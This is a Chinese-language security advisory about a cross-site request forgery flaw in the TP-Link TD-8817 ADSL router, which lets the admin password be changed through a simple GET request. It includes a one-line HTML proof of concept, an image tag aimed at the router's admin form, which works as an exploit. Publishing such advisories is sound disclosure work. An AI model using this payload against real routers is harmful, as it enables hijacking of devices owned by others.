TP-Link TD-8817路由器跨站请求伪造漏洞

发布日期：2013-04-06
更新日期：2013-04-09受影响系统：
TP-LINK TD-8817 6.0.1 Build 111128 Rel.26763
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 58921

TP-Link TD-8817是ADSL2+以太网/USB解调器路由器。

TP-Link TD-8817的默认用户（admin）密码可以在tcp/ip端口80上通过默认路由器页面更改。$_GET即可以更改密码，而无需$_POST请求方法。攻击者可利用此漏洞执行某些管理员操作并非法访问受影响设备。

<*来源：Un0wn_X

链接：http://packetstormsecurity.com/files/121127/tplinktd8817-xsrf.txt
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
<html>
<！-- TP-Link TD-8817 CSRF Explpoit -->
<body>
<img src="http://192.168.1.1/Forms/tools_admin_1"/>
</body>
</html>建议：
--------------------------------------------------------------------------------
厂商补丁：

TP-LINK
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.tp-link.com/lk/products/details/？model=TD-8817IBM Cognos Disclosure Management EdrawSoft ActiveX控件不安全方法漏洞ESPCMS cookie注入漏洞相关资讯 TP-LINK安全漏洞

TP-Link TL-SC3171网络摄像机多个（08/03/2013 14:31:21）
TP-Link TL-SC3171网络摄像机远程（08/02/2013 10:04:58）
TP-LINK TL-PS110U打印服务器" （06/23/2013 07:05:32）

TP-Link TL-SC3171网络摄像机多个（08/03/2013 14:30:54）
TP-Link TL-SC3171网络摄像机任意（08/02/2013 09:59:02）
TP-LINK TL-SC3171 IP Camera身份（06/15/2013 08:09:54）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论